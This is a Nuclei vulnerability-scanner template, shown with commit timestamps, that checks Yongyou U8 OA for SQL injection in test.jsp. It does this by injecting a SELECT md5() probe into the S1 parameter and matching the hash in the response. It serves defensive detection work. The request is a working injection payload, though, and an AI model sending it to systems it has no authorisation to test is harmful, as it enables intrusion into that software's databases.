nuclei-templates/vulnerabilities/other/yongyou-u8-oa-sqli.yaml

25 lines
635 B
YAML
Raw Normal View History

2022-04-08 08:13:23 +00:00
id: yongyou-u8-oa-sqli
info:
name: Yongyou U8 OA Sqli
author: ritikchaddha
severity: high
2022-04-09 19:10:02 +00:00
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
2022-04-08 08:13:23 +00:00
tags: yongyou,u8,oa,sqli
requests:
- method: GET
path:
2022-04-09 19:10:02 +00:00
- "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))"
2022-04-08 08:13:23 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-04-09 19:10:02 +00:00
words:
- '{{md5("{{randstr}}")}}'
2022-04-08 08:13:23 +00:00
- type: status
status:
- 200